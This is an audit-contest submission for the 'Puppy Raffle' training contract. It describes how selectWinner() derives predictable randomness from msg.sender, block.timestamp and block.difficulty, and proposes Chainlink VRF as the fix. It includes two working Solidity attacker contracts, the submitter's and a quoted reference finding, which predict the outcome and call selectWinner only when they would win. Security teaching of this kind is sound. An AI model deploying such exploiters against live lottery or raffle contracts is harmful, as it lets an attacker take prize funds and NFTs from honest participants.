Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak Randomness in selectWinner() Allows Manipulation of Winner Selection and NFT Rarity

vikramgoutham289

Root + Impact

Root Cause: Randomness is derived from predictable on-chain values (msg.sender, block.timestamp, block.difficulty) that can be known or influenced before transaction execution.

Impact: Attackers can predict or manipulate the raffle outcome to guarantee they win and receive the rarest NFT, completely defeating the purpose of a fair raffle.

Description

Normal Behavior: The selectWinner() function should randomly and fairly select a winner from all participants and assign a random rarity to the minted NFT.
Issue: The randomness is derived from predictable on-chain values (msg.sender, block.timestamp, block.difficulty). Miners can manipulate block.timestamp and block.difficulty, while any user can control msg.sender by using different addresses or contracts to call the function when the outcome is favorable.

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

// @> Weak randomness - all inputs are predictable or manipulable

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

address winner = players[winnerIndex];

// ... prize distribution ...

// @> Same issue for rarity determination

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Risk

Likelihood:HIGH

Reason 1 : Miners/validators have direct control over block.timestamp (within limits) and block.difficulty
Reason 2 :Users can deploy contracts at specific addresses to influence msg.sender

Impact:HIGH

Impact 1:Attacker can guarantee they receive a legendary (most rare) NFT
Impact 2: Attacker can guarantee they win the raffle

Proof of Concept

Only submit the selectWinner() transaction when they would win

// SPDX-License-Identifier: MIT

pragma solidity ^0.7.6;

import {PuppyRaffle} from "./PuppyRaffle.sol";

contract RandomnessExploiter {

PuppyRaffle public puppyRaffle;

constructor(address _puppyRaffle) {

puppyRaffle = PuppyRaffle(_puppyRaffle);

}

// Predict if calling selectWinner from this contract will result in us winning

function willIWin() public view returns (bool) {

uint256 playerCount = puppyRaffle.getPlayersLength();

// Simulate the randomness calculation

uint256 winnerIndex = uint256(

keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))

) % playerCount;

// Check if winner is us

address predictedWinner = puppyRaffle.players(winnerIndex);

return predictedWinner == address(this);

}

// Predict the rarity we would get

function predictRarity() public view returns (uint256) {

uint256 rarity = uint256(

keccak256(abi.encodePacked(address(this), block.difficulty))

) % 100;

if (rarity <= 70) return 70; // Common

if (rarity <= 95) return 25; // Rare

return 5; // Legendary

}

// Only call selectWinner if we will win

function exploitSelectWinner() external {

require(willIWin(), "Not favorable - try again later");

puppyRaffle.selectWinner();

}

// Enter the raffle

function enterRaffle() external payable {

address[] memory players = new address[](1);

players[0] = address(this);

puppyRaffle.enterRaffle{value: msg.value}(players);

}

// Required to receive NFT

function onERC721Received(address, address, uint256, bytes calldata) external pure returns (bytes4) {

return this.onERC721Received.selector;

}

receive() external payable {}

}

Recommended Mitigation

Contract requests randomness with a unique request ID

+ import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";

+ import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/interfaces/VRFCoordinatorV2Interface.sol";

- contract PuppyRaffle is ERC721, Ownable {

+ contract PuppyRaffle is ERC721, Ownable, VRFConsumerBaseV2 {

+ VRFCoordinatorV2Interface private immutable i_vrfCoordinator;

+ uint64 private immutable i_subscriptionId;

+ bytes32 private immutable i_gasLane;

+ uint32 private immutable i_callbackGasLimit;

+ uint16 private constant REQUEST_CONFIRMATIONS = 3;

+ uint32 private constant NUM_WORDS = 2;

+ mapping(uint256 => uint256) private s_requestIdToRaffleId;

- function selectWinner() external {

+ function requestRandomWinner() external returns (uint256 requestId) {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+ requestId = i_vrfCoordinator.requestRandomWords(

+ i_gasLane,

+ i_subscriptionId,

+ REQUEST_CONFIRMATIONS,

+ i_callbackGasLimit,

+ NUM_WORDS

+ );

+ }

+ function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {

+ uint256 winnerIndex = randomWords[0] % players.length;

+ uint256 rarity = randomWords[1] % 100;

+ address winner = players[winnerIndex];

+ // ... rest of winner selection logic ...

+ }

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 6 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!